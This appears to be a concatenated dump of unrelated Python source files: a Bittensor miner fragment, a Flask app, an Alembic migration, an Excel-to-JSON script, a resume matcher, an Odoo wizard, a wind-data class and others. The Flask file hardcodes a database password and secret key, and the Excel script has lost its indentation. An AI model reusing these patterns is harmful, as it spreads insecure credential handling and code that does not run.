                ip = self.external_ip,
                port = self.external_port,
                modality = bittensor.proto.Modality.TEXT,
                wait_for_finalization = True,
                timeout = 4 * bittensor.__blocktime__,
        )
        if not subscribe_success:
            raise RuntimeError('Failed to subscribe neuron.')
        # ---- Starting axon ----
        self.axon.start()
    def shutdown ( self ):
        r""" Shuts down the miner and its dependencies (currently: stops
        serving the axon endpoint).
        """
        # ---- Stop axon ----
        self.axon.stop()
# ---- QQDM Training logs ----
    def epoch_logs( self, progress_bar, iteration:int, output: SimpleNamespace, prev_mechanism_weights: List[float], next_mechanism_weights: List[float] ):
        r""" Called after every training step. Displays miner state to screen.

        Builds a colored key/value map (global/local step, epoch, losses,
        stake/rank/incentive, and per-peer weight changes) for the qqdm
        progress bar, and mirrors the losses to tensorboard when enabled.
        """
        # Locate our own uid on the metagraph to read stake/rank/incentive.
        self_uid = self.metagraph.hotkeys.index( self.wallet.hotkey.public_key )
        stake = self.metagraph.S[ self_uid ].item()
        rank = self.metagraph.R[ self_uid ].item()
        incentive = self.metagraph.I[ self_uid ].item()
        info = {
            'GS': colored('{}'.format(self.global_step), 'red'),
            'LS': colored('{}'.format(iteration), 'blue'),
            'Epoch': colored('{}'.format(self.epoch+1), 'green'),
            'Loss': colored('{:.4f}'.format(self.epoch_loss), 'yellow'),
            'Best': colored('{:.4f}'.format(self.best_epoch_loss), 'red'),
            'L-loss': colored('{:.4f}'.format(output.local_target_loss.item()), 'blue'),
            'R-loss': colored('{:.4f}'.format(output.remote_target_loss.item()), 'green'),
            'D-loss': colored('{:.4f}'.format(output.distillation_loss.item()), 'yellow'),
            'nPeers': colored(self.metagraph.n.item(), 'red'),
            'Stake(\u03C4)': colored('{:.3f}'.format(stake), 'green'),
            'Rank(\u03C4)': colored('{:.3f}'.format(rank), 'blue'),
            'Incentive(\u03C4/block)': colored('{:.6f}'.format(incentive), 'yellow'),
        }
        # Show only peers with a non-zero weight; color encodes the delta since
        # the previous step: green = increased, white = unchanged, red = decreased.
        for uid in self.metagraph.uids.tolist():
            if next_mechanism_weights[uid] != 0:
                weight_dif = next_mechanism_weights[uid] - prev_mechanism_weights[uid]
                if weight_dif > 0:
                    info[colored(str(uid), 'green')] = colored('{:.4f}'.format(next_mechanism_weights[uid]), 'green')
                elif weight_dif == 0:
                    info[str(uid)] = colored('{:.4f}'.format(next_mechanism_weights[uid]), 'white')
                else:
                    info[colored(str(uid), 'red')] = colored('{:.4f}'.format(next_mechanism_weights[uid]), 'red')
        progress_bar.set_infos( info )
        if self.config.neuron.use_tensorboard:
            self.tensorboard.add_scalar('R-loss', output.remote_target_loss.item(), self.global_step)
            self.tensorboard.add_scalar('L-loss', output.local_target_loss.item(), self.global_step)
            self.tensorboard.add_scalar('D-loss', output.distillation_loss.item(), self.global_step)
if __name__ == "__main__":
    # Script entry point: construct the miner neuron and run its training loop.
    neuron().run()
|
18,347 | 5a4f6e4ab85d8fb7918b0fe89c67d59102cef824 | import os
import redis
from flask import Flask
from flask_session import Session
from User.house_views import house
from User.models import db
from User.order_views import order_blueprint
from User.views import user
se = Session()
def create_app():
    """
    Application factory: build and configure the Flask app.

    Configures MySQL (SQLAlchemy), redis-backed server-side sessions, and
    registers the user/house/order blueprints.

    :return: the configured :class:`flask.Flask` application
    """
    BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
    static_folder = os.path.join(BASE_DIR, 'static')
    template_folder = os.path.join(BASE_DIR, 'html')
    app = Flask(__name__,
                template_folder=template_folder,
                static_folder=static_folder)
    # MySQL database configuration
    app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:123456@localhost:3306/ihome'
    app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
    app.config['SECRET_KEY'] = '\x9dF\x19\xdd#\x8c>K\xeb\xe4k|fq\x96Q\xcd\x05~\xb6'
    # Parameters used to create the redis instance
    REDIS_HOST = "127.0.0.1"
    REDIS_PORT = 6379
    # flask-session parameters
    app.config['SESSION_TYPE'] = "redis"  # where session data is stored
    app.config['SESSION_USE_SIGNER'] = True  # sign the session id
    app.config['SESSION_REDIS'] = redis.StrictRedis(host=REDIS_HOST, port=REDIS_PORT)  # redis backend for session data
    # FIX: this was assigned to a dead local variable, so the lifetime was
    # never applied; it must go into app.config to take effect.
    app.config['PERMANENT_SESSION_LIFETIME'] = 86400  # session lifetime in seconds
    app.register_blueprint(blueprint=user, url_prefix='/user')
    app.register_blueprint(blueprint=house, url_prefix='/house')
    app.register_blueprint(blueprint=order_blueprint, url_prefix='/order')
    se.init_app(app=app)
    db.init_app(app=app)
    return app
|
18,348 | 3fead08d2aab188e1f1b6128962b72c905d330f2 | """merge emails and summaries
Revision ID: 5279ea22b197
Revises: bffd7d81d326, 05eca1c82f14
Create Date: 2019-03-08 13:07:03.446641
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '5279ea22b197'
# Tuple down_revision marks this migration as the merge point of two branches.
down_revision = ('bffd7d81d326', '05eca1c82f14')
branch_labels = None
depends_on = None
def upgrade():
    # Intentional no-op: this is a merge-point migration that only joins two
    # revision branches; it performs no schema changes.
    pass
def downgrade():
    # Intentional no-op: nothing to revert for a merge-point migration.
    pass
|
18,349 | b357caec306aee949696a728bae649f61df79860 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @File: config.py
# @Brief:excel导出json
# @Date: 2016-12-23
#
# @pyexcel_xls: http://pythonhosted.org/pyexcel-xls/#read-from-an-xls-file
#
import os
import json
import sys
from pyexcel_xls import get_data
# Python 2 only: force UTF-8 as the default string encoding.
reload(sys)
sys.setdefaultencoding('utf8')
# Path of the local excel workbooks to convert
origin_path = "../table"
# Output json configuration file
file_config = "./config.json"
# Accumulators filled by get_config(): parsed tables and processed-file count.
config = {}
count = 0
def get_config(path):
global count
for dir_path, dir_names, file_names in os.walk(path):
for file in file_names:
if (0 == file.find(".")):
continue
count = count + 1
print ">> " + file
data = get_data(dir_path + "/" + file)
for k in data:
if len(data[k]):
tab = data[k][1]
n = -1
cell = {}
for index in data[k]:
n = n + 1
if n < 2:
continue
cell[index[0]] = {}
m = 0
for i in index:
cell[index[0]][tab[m]] = i
m = m + 1
config[file.rstrip(".xlsx")] = cell
def main():
    """Convert every workbook under origin_path and write the merged json."""
    get_config(origin_path)
    # ensure_ascii=False keeps CJK text readable in the output file.
    content = json.dumps(config, ensure_ascii = False, indent = 4)
    # NOTE(review): `file` shadows the Python 2 builtin of the same name.
    file = open(file_config,"w")
    file.write(content)
    file.close()
    print "count: " + str(count) + "\nDone!"
if __name__ == "__main__":
    # Script entry point.
    main()
|
18,350 | 43573273ba275171726e20d1824610f829ddfce5 | # -*- coding: utf-8 -*-
"""
Created on Sun Sep 22 12:07:24 2019
@author: Luis Flosi
"""
# Import libraries
import docx2txt
import glob
import requests
import pandas
from bs4 import BeautifulSoup
import re
# Welcome message
print('Welcome to resume match!')
print('We currently only accept .docx resumes')
# Insert URL and docx fodler's path
url_input = input('Enter job URL:')
folder_path = input("Enter resume folder's path:")
# Prepare path to include all .docx in folder
files_path = folder_path + '/*.docx'
# Include symbols and common words to be removed
symbols = "!@#$%^&*()_-+={[}]|\;:'<>?/., "
common_words = ['also', 'have', 'other', 'such', 'all', 'using', 'will', 'from',
'or','is','a','the','for', 'an', 'as', 'of', 'to', 'at', 'with',
'in', 'on', 'that', 'and', 'into', 'by', 'us', 'we', 'you', 'you',
'are', "isn't", ]
# Set delimiters to be used for separation (in regex)
delimiters_re = '; |, |\*|\n|\\t|\b|\| |\s|/|-'
# Function to split words into a list
def splitContent(content):
    """Lower-case `content`, split it on the delimiters in the module-level
    `delimiters_re`, and return the non-empty fragments as a list."""
    lowered = content.lower()
    fragments = re.split(delimiters_re, lowered)
    # FIX: removed a dead loop that did `word = word.split` — it only bound
    # the method object to a throwaway local and had no effect.
    return list(filter(None, fragments))
# Function to remove common english words and symbols
def cleanWordList(wordlist):
    """Strip every character of the module-level `symbols` set from each word
    and drop words that end up empty or appear in `common_words`."""
    cleaned = []
    for raw_word in wordlist:
        stripped = ''.join(ch for ch in raw_word if ch not in symbols)
        if stripped and stripped not in common_words:
            cleaned.append(stripped)
    return cleaned
# Maps each source (resume file name or job URL) to its cleaned word list.
files = {}
# Load all .docx into dictionary, split and clean
def cleanDOCX(path):
    """Read every .docx under `path`, tokenize and clean its text, and store
    the resulting word list in the module-level `files` dict, keyed by the
    bare file name."""
    # Build a forward-slash glob pattern regardless of the input separator.
    pattern = (path + '\\*.docx').replace('\\', '/')
    for doc_path in glob.glob(pattern):
        raw_content = docx2txt.process(doc_path)
        cleaned_words = cleanWordList(splitContent(raw_content))
        doc_name = doc_path.replace('\\', '/').rsplit('/', 1)[-1]
        files[doc_name] = cleaned_words
# Scrape URL, split words into a list and clean them
def cleanURL(url):
    """Fetch `url`, extract the text of every <div id="content"> element,
    tokenize and clean the words, and store the list in the module-level
    `files` dict keyed by the url."""
    url_wordlist = []
    source_code = requests.get(url).text
    soup = BeautifulSoup(source_code, 'html.parser')
    # The job description lives under <div> tags with id="content".
    for each_text in soup.findAll('div', {'id': 'content'}):
        # FIX: removed a dead `each_word.lower()` whose result was discarded;
        # splitContent() already lower-cases everything.
        for each_word in splitContent(each_text.text):
            if each_word not in common_words:
                url_wordlist.append(each_word)
    url_wordlist = cleanWordList(url_wordlist)
    files[url] = url_wordlist
# Organize words from documents into a data frame to include count of words
def dataFrameDic(dic):
    """Build a DataFrame of word counts from {source: word_list}.

    Rows are words, one column per source, plus a "sum" column; rows are
    sorted by total count, descending.
    """
    # word -> list of per-source counts, appended in source order
    word_count_list = {}
    names = []
    # First pass: register every distinct word with an empty count list.
    for s,w in dic.items():
        for word in w:
            if word in word_count_list:
                continue
            else:
                word_count_list[word] = []
    # Second pass: count each word per source (0 when absent) and record the
    # source name so columns can be labeled later.
    for source,words in dic.items():
        word_count = {}
        for word in words:
            if word in word_count:
                continue
            else:
                count_list = []
                count_list.insert(0,words.count(word))
                word_count[word] = count_list
        for k, v in word_count_list.items():
            if k in word_count:
                word_count_list[k] += word_count[k]
            else:
                word_count_list[k] += [0]
        names.append(source)
    # Words become columns first, then transpose so they become rows.
    inverted_word_df = pandas.DataFrame(word_count_list)
    word_df = inverted_word_df.T
    word_df.columns = names
    word_df["sum"] = word_df.sum(axis = 1)
    word_df = word_df.sort_values("sum", ascending=False)
    return word_df
# ---- Script driver: ingest resumes and job posting, then export the counts.
cleanDOCX(folder_path)
cleanURL(url_input)
df = dataFrameDic(files)
try:
    df.to_csv(r'answer.csv')
    # NOTE(review): "fille" typo is in a runtime message; left untouched here.
    print("Successfully created csv fille")
# NOTE(review): bare except hides the actual error; consider `except OSError as e`.
except:
    print("Error writing file")
|
18,351 | e334f2acd583bce20842cf5f634188346eef079e | import matplotlib.animation as animation
import matplotlib.pyplot as plt
import numpy as np
class Anim:
    """Minimal matplotlib demo: a scatter plot whose offsets are replaced with
    fresh random values on every animation frame."""
    def __init__(self):
        # Grid of random starting coordinates: x and y each get `rows` values.
        self.rows = 2
        self.col = 2
        self.x, self.y = np.random.random( (self.col, self.rows) )
        self.fig = plt.figure(figsize=(16,9))
        # Keep a reference to the FuncAnimation, otherwise it is garbage
        # collected and the animation stops.
        self.anim = animation.FuncAnimation(self.fig, self._update_plot,
                                            init_func=self._plot_init)
        # Scatter artist; created lazily by _plot_init when the animation starts.
        self.scat = None
    def _plot_init(self):
        # Called once by FuncAnimation to draw the initial frame.
        self.scat = plt.scatter(self.x, self.y)
    def _update_plot(self, i):
        # NOTE(review): set_offsets conventionally takes an (N, 2) array of
        # points; the (2, 1) shape here looks transposed — confirm against
        # matplotlib's PathCollection.set_offsets.
        self.scat.set_offsets(np.random.random((2, 1)))
        return self.scat,
    def plot(self):
        # self._plot_init()
        plt.show()
if __name__ == "__main__":
anim = Anim()
anim.plot() |
18,352 | 6eb560e0676978affb030715e812de924f01a79d | # -*- coding: utf-8 -*-
from odoo import models, fields, api, _
class AccountDebitNote(models.TransientModel):
    """Extends the debit-note wizard with the Peruvian (SUNAT) debit note
    type code (catalog 10) and propagates it to the move being created."""
    _inherit = "account.debit.note"

    # FIX: label typo "Dedit" -> "Debit" (user-facing string).
    pe_debit_note_code = fields.Selection(
        selection="_get_pe_debit_note_type", string="Debit Note Code")

    @api.model
    def _get_pe_debit_note_type(self):
        """Selection options: SUNAT catalog 10 entries stored in pe.datas."""
        return self.env['pe.datas'].get_selection("PE.CPE.CATALOG10")

    def _prepare_default_values(self, move):
        """Override: route the new move to the journal configured on the
        source move's journal and stamp the PE-specific document codes."""
        res = super()._prepare_default_values(move)
        # NOTE(review): `dedit_note_id` is the field's actual (misspelled)
        # name on account.journal; renaming it would require a migration.
        journal_id = move.journal_id.dedit_note_id.id or res.get('journal_id')
        journal = self.env['account.journal'].browse(journal_id)
        res.update({
            'journal_id': journal.id,
            'origin_doc_code': self.pe_debit_note_code,
            'pe_invoice_code': journal.pe_invoice_code,
        })
        return res
# def reverse_moves(self):
# res = super(AccountMoveReversal, self).reverse_moves()
# if self.env.context.get("is_pe_debit_note", False):
# invoice_domain = res['domain']
# if invoice_domain:
# del invoice_domain[0]
# res['domain'] = invoice_domain
# return res
|
18,353 | 49e5e191abd18ebc755cc63e54174885a8d1b258 | import datetime
from enum import Enum
import re
import json
from utils import config
import consts
class WindSpdUnit(Enum):
    """Wind speed units accepted from scraped sources."""
    KN = 'kn'  # knots
    KH = 'kh'  # kilometres per hour
    MS = 'ms'  # metres per second

class windInfo:
    """One scraped wind observation, normalized: direction (degrees + compass
    name), average/gust speed converted to knots, timestamps, temperatures
    and barometric pressure, plus JSON serialization helpers."""
    def __init__(self, sourceName, sourceURL, speedUnit = None, strengthSeperator = '-'):
        # Timestamp of the scrape itself (not of the observation).
        self._scrapTimeStamp = datetime.datetime.now().timestamp()
        self._scrapTimeStampStr = datetime.datetime.now().strftime("%d/%m/%Y %H:%M:%S")
        # Unit of incoming speed values; km/h when the source does not say.
        self._inputWindStrengthUnit = speedUnit or WindSpdUnit.KH
        self._windDir = None
        self._windDirName = None
        self._windAvg = None
        self._windGust = None
        self._windStrength = None
        self._infoDate = None
        self._infoTime = None
        self._infoDateTime = None
        self._infoSourceName = sourceName
        self._infoSourceURL = sourceURL
        self._infoImage = ""
        self._waterTemp = None
        self._Temp = None
        self._barometerPreasure = None
        # Separator between avg and gust in combined strength strings, e.g. "10-15".
        self._strengthSeperator = strengthSeperator
        self._readAlerted = False
        self._windChanged = None
    # Utils functions
    def getWindDirName(self, windDir = None):
        """Map a bearing in degrees to a 16-point compass name.

        Uses `windDir` when given (and truthy), otherwise `self.windDir`.
        """
        # NOTE(review): a passed windDir of exactly 0 is falsy and falls back
        # to self.windDir — confirm callers never pass 0 meaning due north.
        windDirVal = windDir or self.windDir
        # FIX: was `> 354.5 and <= 5.625`, which can never be true — north
        # wraps around 360 degrees, so the two ranges must be OR-ed. The lower
        # bound is aligned with the NNW upper bound (354.375) to close the gap.
        if windDirVal > 354.375 or windDirVal <= 5.625:
            return 'N'
        # NOTE(review): the sector labels/widths below differ from the standard
        # 16-point rose (e.g. 'E' spans 50.625-129.375 and there is no 'NE');
        # preserved as-is pending confirmation of the source's convention.
        elif windDirVal > 5.625 and windDirVal <= 28.125:
            return 'NNE'
        elif windDirVal > 28.125 and windDirVal <= 50.625:
            return 'ENE'
        elif windDirVal > 50.625 and windDirVal <= 129.375:
            return 'E'
        elif windDirVal > 129.375 and windDirVal <= 151.875:
            return 'SE'
        elif windDirVal > 151.875 and windDirVal <= 174.375:
            return 'ESE'
        elif windDirVal > 174.375 and windDirVal <= 196.875:
            return 'S'
        elif windDirVal > 196.875 and windDirVal <= 219.375:
            return 'SSW'
        elif windDirVal > 219.375 and windDirVal <= 241.875:
            return 'SW'
        elif windDirVal > 241.875 and windDirVal <= 264.375:
            return 'WSW'
        elif windDirVal > 264.375 and windDirVal <= 286.875:
            return 'W'
        elif windDirVal > 286.875 and windDirVal <= 309.375:
            return 'WNW'
        elif windDirVal > 309.375 and windDirVal <= 331.875:
            return 'NW'
        elif windDirVal > 331.875 and windDirVal <= 354.375:
            return 'NNW'
        else:
            return 'n/a'
    def getNumber(self, val):
        ''' Return `val` unchanged when it is already numeric; for a string,
        extract the first run of digits with a regex (ie if val is 45NE then
        will return '45' — note the string branch returns a str, not an int).
        Returns None when the string holds no digits. '''
        valtype = type(val)
        if valtype is int or valtype is float:
            return val
        elif valtype is str:
            num = re.findall('\d+', val)
            if num:
                return num[0]
            else:
                return None
        else:
            raise Exception('Error while getNumber from content {}'.format(val))
    def extractRegEx(self, extractorConfig, val):
        ''' Apply the station-specific extraction regex named by
        `extractorConfig` (looked up in the config for this source) to `val`.
        Returns `val` untouched when no regex is configured, the first capture
        when one matches, or None when it does not match. '''
        regex = config.get(self.infoSourceName, extractorConfig)
        if regex is None or not regex:
            return val
        else:
            extract = re.findall(regex, val)
            if extract:
                # A tuple result means the regex had several groups; use the first.
                if len(extract[0]) > 0:
                    return extract[0][0]
                else:
                    return extract[0]
            else:
                return None
    def getDateTime(self, val):
        """Parse `val` into a datetime using the station's configured date and
        time formats; missing year/date parts are filled from today."""
        readDateTime = None
        datetimeVal = self.extractRegEx("datetimeExtractor", val)
        try:
            dateTimeFormat = config.get(self.infoSourceName, "dateFormat") + " " + config.get(self.infoSourceName, "timeFormat")
            readDateTime = datetime.datetime.strptime(datetimeVal.strip(), dateTimeFormat.strip())
            # Year 1900 (strptime's default) means the input had no year.
            if readDateTime.year == 1900:
                readDateTime = readDateTime.replace(year=datetime.datetime.now().year)
            # 1st of January means the input had no date at all.
            if readDateTime.day == 1 and readDateTime.month == 1:
                readDateTime = readDateTime.replace(day=datetime.datetime.now().day, month=datetime.datetime.now().month)
        finally:
            # NOTE: the return inside `finally` deliberately swallows any
            # parse error and yields None (best-effort parsing).
            return readDateTime
    def getKnots(self, value):
        """Convert `value` (possibly a string with unit suffix) to knots,
        rounded to the nearest integer, based on the input unit."""
        val = self.getNumber(value)
        # NOTE(review): these comparisons match the unit's *string* value only;
        # when _inputWindStrengthUnit holds a WindSpdUnit member (the
        # constructor default) neither branch matches and the value is treated
        # as knots — confirm this is the intended behavior.
        if self._inputWindStrengthUnit == WindSpdUnit.MS.value:
            return round(float(val) * 1.94)
        elif self._inputWindStrengthUnit == WindSpdUnit.KH.value:
            return round(float(val) * 0.54)
        else:
            return round(float(val))
    def getString(self, val, regex = '[A-z]{2,4}'):
        ''' Return `val` when it is entirely 2-4 letters (used to pull a
        compass name such as NE out of an input token); otherwise None. '''
        strVal = re.fullmatch(regex, val)
        if strVal:
            return strVal[0]
        else:
            return None
    def encode_complex(self, z):
        '''
        json.dump default= hook: the json module calls this for any object it
        cannot serialize natively.
        '''
        if isinstance(z, WindSpdUnit):
            # serialize the enum by its string value
            return z.value
        elif isinstance(z, (datetime.date, datetime.datetime)):
            return z.isoformat()
        else:
            type_name = z.__class__.__name__
            raise TypeError(f"Object of type '{type_name}' is not JSON serializable")
    def toJSON(self, asString = False):
        """Serialize this observation; returns the encoded JSON bytes when
        `asString` is truthy, otherwise the parsed dict."""
        j = json.dumps(self.__dict__, default=self.encode_complex, indent=4).encode()
        return j if asString else json.loads(j)
    # Properties - setters and getters
    @property
    def windDir(self):
        return self._windDir
    @windDir.setter
    def windDir(self, value):
        # value can contain wind direction name characters, e.g. "45NE"
        dirVal = int(self.getNumber(value))
        self._windDir = dirVal
        # FIX: identity test `is None` replaces `== None`.
        if self.windDirName is None:
            # Prefer a name embedded in the value; otherwise derive it.
            self.windDirName = self.getString(value) or self.getWindDirName()
    @property
    def windDirName(self):
        return self._windDirName
    @windDirName.setter
    def windDirName(self, value):
        self._windDirName = value
    @property
    def windAvg(self):
        return self._windAvg
    @windAvg.setter
    def windAvg(self, value):
        self._windAvg = self.getKnots(value)
    @property
    def windGust(self):
        return self._windGust
    @windGust.setter
    def windGust(self, value):
        self._windGust = self.getKnots(value)
    @property
    def windStrength(self):
        return self._windStrength
    @windStrength.setter
    def windStrength(self, value):
        # A combined "avg<sep>gust" string, e.g. "kn10-15"; parse it when avg
        # and gust were not already set individually.
        self._windStrength = value
        if self.windAvg == None and self.windGust == None:
            strength = value.split(self._strengthSeperator)
            if strength and strength.__len__() == 2:
                units = self.getString(strength[0])
                if units and units.upper() in WindSpdUnit.__members__:
                    self._inputWindStrengthUnit = WindSpdUnit[units.upper()]
                self._windAvg = self.getNumber(strength[0])
                self._windGust = self.getNumber(strength[1])
    @property
    def infoDate(self):
        return self._infoDate
    @infoDate.setter
    def infoDate(self, value):
        self._infoDate = value
    @property
    def infoTime(self):
        return self._infoTime
    @infoTime.setter
    def infoTime(self, value):
        self._infoTime = value
    @property
    def infoSourceName(self):
        return self._infoSourceName
    @infoSourceName.setter
    def infoSourceName(self, value):
        self._infoSourceName = value
    @property
    def infoSourceURL(self):
        return self._infoSourceURL
    @infoSourceURL.setter
    def infoSourceURL(self, value):
        self._infoSourceURL = value
    @property
    def infoImage(self):
        return self._infoImage
    @infoImage.setter
    def infoImage(self, value):
        self._infoImage = value
    @property
    def waterTemp(self):
        return self._waterTemp
    @waterTemp.setter
    def waterTemp(self, value):
        self._waterTemp = value
    @property
    def Temp(self):
        return self._Temp
    @Temp.setter
    def Temp(self, value):
        self._Temp = value
    @property
    def barometerPreasure(self):
        return self._barometerPreasure
    @barometerPreasure.setter
    def barometerPreasure(self, value):
        self._barometerPreasure = value
    @property
    def scrapTimeStamp(self):
        return self._scrapTimeStamp
    @property
    def strengthSeperator(self):
        return self._strengthSeperator
    @property
    def readDateTime(self):
        # TODO return always a datetime datatype (currently falls back to a
        # "date time" string when no parsed datetime is available).
        return self._infoDateTime if self._infoDateTime is not None else str.format("{} {}", self.infoDate, self.infoTime)
    @readDateTime.setter
    def readDateTime(self, Value):
        readDateTime = self.getDateTime(Value)
        if readDateTime is not None:
            self._infoDateTime = readDateTime
            dFormat = config.get(self.infoSourceName, "dateFormat") if config.get(self.infoSourceName, "dateFormat") else '%d/%m/%y'
            tFormat = config.get(self.infoSourceName, "timeFormat") if config.get(self.infoSourceName, "timeFormat") else '%H:%M'
            self.infoDate = readDateTime.strftime(dFormat)
            self.infoTime = readDateTime.strftime(tFormat)
|
18,354 | 2fdd5e4a687fcd840b10f730b14e35a97c6425e4 |
def read_matrix(filename):
    """Load a text file containing a grid of integers and return it as a list
    of lists, so that matrix[r][c] is the element on row #r and column #c."""
    matrix = []
    with open(filename, 'r') as input_file:
        for line in input_file:
            matrix.append([int(token) for token in line.split()])
    return matrix
|
18,355 | 718f2d8896e260215ff0be8715c860de08bea52a | # -*- coding: utf-8 -*-
import re
import context
TAB = ' '
def name(prefix = 'tmp'):
    """Generate a unique name such as ``_tmp_0`` within the current context,
    bumping the per-prefix counter stored under ``NAME_INDEX``."""
    counters = context.curr().setdefault('NAME_INDEX', {})
    next_idx = counters.setdefault(prefix, 0)
    counters[prefix] = next_idx + 1
    return '_%s_%d' % (prefix, next_idx)
class Code(object):
    """A compiled code fragment: a (possibly empty) statement block `stat`
    plus a single-line expression `value` that yields the fragment's result,
    with optional `meta` information for later optimization passes."""
    def __init__(self, stat, value, **meta):
        # rstrip to delete trailing newlines
        self.stat = stat.rstrip()
        # Expr should be one line and no indent
        self.value = value.strip()
        self.meta = meta
    def add_meta(self, **info):
        """Add meta information to code block for further optimization"""
        new_meta = dict(self.meta)
        new_meta.update(info)
        return type(self)(self.stat, self.value, **new_meta)
    def is_expr(self):
        """True when this fragment is a pure expression (no statements)."""
        return not self.stat
    def asname(self, name):
        """Return a fragment whose value is bound to `name`; no-op when the
        value already is that name."""
        if self.value == name:
            return self
        return type(self)(self.stat + '\n%s=%s' % (name, self.value), name)
    @staticmethod
    def is_expr_pure(expr):
        """True when `expr` is a bare identifier/number (safe to duplicate or
        drop without side effects)."""
        return bool(re.match(r'[0-9a-zA-Z_]*$', expr))
    def __add__(self, other):
        """Sequence two fragments: run self (evaluating its value only when it
        may have side effects), then other; the result is other's value."""
        stat = self.stat
        if not Code.is_expr_pure(self.value):
            if stat:
                stat += '\n'
            stat += self.value
        if stat:
            stat += '\n'
        stat += other.stat
        return type(self)(stat, other.value)
    # Placeholder marker replaced by the args of from_tpl.
    SLOT = '$#'
    @classmethod
    def from_tpl(cls, tpl, *args, **meta):
        """Instantiate template `tpl`, filling each ``$#`` slot from `args`
        left to right. A line that is only a slot receives a whole Code block
        (statements included); slots inside a line receive expressions, with
        temporaries inserted to preserve evaluation order when needed. The
        template's last unindented line becomes the resulting value."""
        tpl_lines = tpl.strip().split('\n')
        arg_idx = 0
        output_lines = []
        for tpl_line in tpl_lines:
            tpl_line = tpl_line.rstrip()
            if not tpl_line:
                # skip blank line
                continue
            if cls.SLOT not in tpl_line:
                # constant line
                output_lines.append(tpl_line)
                continue
            # count indent level of this line
            idx = 0
            while tpl_line[idx] in ' \t':
                idx += 1
            line_indent = tpl_line[:idx]
            if tpl_line.strip() == cls.SLOT:
                # Insert code block here
                ins_code = args[arg_idx]
                arg_idx += 1
                if not isinstance(ins_code, cls):
                    # plain value: inline its repr as a literal
                    output_lines.append(line_indent + repr(ins_code))
                else:
                    # Insert the code block, handling code indent
                    output_lines.extend(
                        [line_indent + x for x
                         in ins_code.stat.split('\n') if x])
                    if not Code.is_expr_pure(ins_code.value):
                        output_lines.append(line_indent + ins_code.value)
                continue
            # Apply argument as expr argument, always from left to right
            # As far as I know, this is consistent with Python runtime behavior
            # Find number of slots to fill
            num_slots = len(re.findall(r'\$#', tpl_line))
            # Determine if we should assign tmp var to deal with
            # stat->expr problem
            need_arg_assign = False
            if num_slots > 1:
                for idx in xrange(num_slots):
                    arg = args[arg_idx + idx]
                    if isinstance(arg, Code) and not arg.is_expr():
                        need_arg_assign = True
                        break
            fill_exprs = []
            name_prefix = name('arg')
            for idx in xrange(num_slots):
                arg = args[arg_idx + idx]
                if isinstance(arg, Code):
                    if need_arg_assign and not Code.is_expr_pure(arg.value):
                        # In this case, we should assign the arg into tmp var
                        # 1. convert stat into expr,
                        # 2. preserve computation order
                        arg = arg.asname('%s_%d' % (name_prefix, idx))
                    # append any prefix statments to output_lines
                    output_lines.extend([line_indent + x for x in arg.stat.split('\n') if x])
                    fill_exprs.append(arg.value)
                else:
                    fill_exprs.append(repr(arg))
            arg_idx += num_slots
            # fill in slots
            sects = tpl_line.split(cls.SLOT)
            line = sects[0] + ''.join(
                [fill_exprs[i] + sects[i + 1] for i in xrange(num_slots)])
            output_lines.append(line)
        # Join output lines and return final Code object
        if not output_lines:
            return cls('', 'None', **meta)
        if output_lines[-1][0] in ' \t':
            # The last line of output line is indented
            # it cannot treated as output value
            return cls('\n'.join(output_lines), 'None', **meta)
        else:
            return cls('\n'.join(output_lines[:-1]), output_lines[-1], **meta)
create = Code.from_tpl
|
18,356 | e744ecc30f4a31c7b4dc425574ab0e047fe2b78d | # coding=utf-8
#
# Copyright (c) 2017-2021 F5 Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""This module defines the exceptions used in f5_cccl."""
class F5CcclError(Exception):
    """Root of the f5_cccl exception hierarchy."""

    def __init__(self, msg=None):
        """Store the optional error message."""
        super(F5CcclError, self).__init__()
        self.msg = msg

    def __str__(self):
        """Render as 'ClassName - msg', or just 'ClassName' with no message."""
        classname = self.__class__.__name__
        if not self.msg:
            return classname
        return "{0} - {1}".format(classname, self.msg)


class F5CcclSchemaError(F5CcclError):
    """Raised when the base schema defining the API is itself invalid."""

    def __init__(self, msg):
        """Prefix the message with the schema-invalid preamble."""
        super(F5CcclSchemaError, self).__init__(msg)
        self.msg = 'Schema provided is invalid: ' + msg


class F5CcclValidationError(F5CcclError):
    """Raised when a service config fails validation against the API schema."""

    def __init__(self, msg):
        """Prefix the message with the schema-mismatch preamble."""
        super(F5CcclValidationError, self).__init__(msg)
        self.msg = 'Service configuration provided does not match schema: ' + msg


class F5CcclResourceCreateError(F5CcclError):
    """General resource creation failure."""


class F5CcclResourceConflictError(F5CcclError):
    """Resource already exists on BIG-IP?."""


class F5CcclResourceNotFoundError(F5CcclError):
    """Resource not found on BIG-IP?."""


class F5CcclResourceRequestError(F5CcclError):
    """Resource request client error on BIG-IP?."""


class F5CcclResourceUpdateError(F5CcclError):
    """General resource update failure."""


class F5CcclResourceDeleteError(F5CcclError):
    """General resource delete failure."""


class F5CcclApplyConfigError(F5CcclError):
    """General config deployment failure."""


class F5CcclCacheRefreshError(F5CcclError):
    """Failed to update the BigIP configuration state."""


class F5CcclConfigurationReadError(F5CcclError):
    """Failed to create a Resource from the API configuration."""
18,357 | 92a575d985beaae79be51d4f0a9f0ad8b5fd8f3a | '''
Task
The provided code stub reads two integers, a and b, from STDIN.
Add logic to print two lines. The first line should contain the result of integer division, a//b . The second line should contain the result of float division, a/b .
No rounding or formatting is necessary.
'''
if __name__ == '__main__':
    # Read the two integers from STDIN, then print the integer-division
    # result followed by the float-division result (no rounding/formatting).
    numerator = int(input())
    denominator = int(input())
    print(numerator // denominator)
    print(numerator / denominator)
18,358 | 1f237c43611f553ec7d9efcc443ac32296227234 | #!/usr/bin/env python
# coding: utf-8
# @Time : 2018/11/14 11:09
# @Author : toddlerya
# @FileName : run.py
# @Project : test
from __future__ import unicode_literals
import matplotlib.pyplot as plt
from PIL import Image
from collections import defaultdict
def get_threshold(image):
    """
    Return the pixel value that occurs most often in `image`.
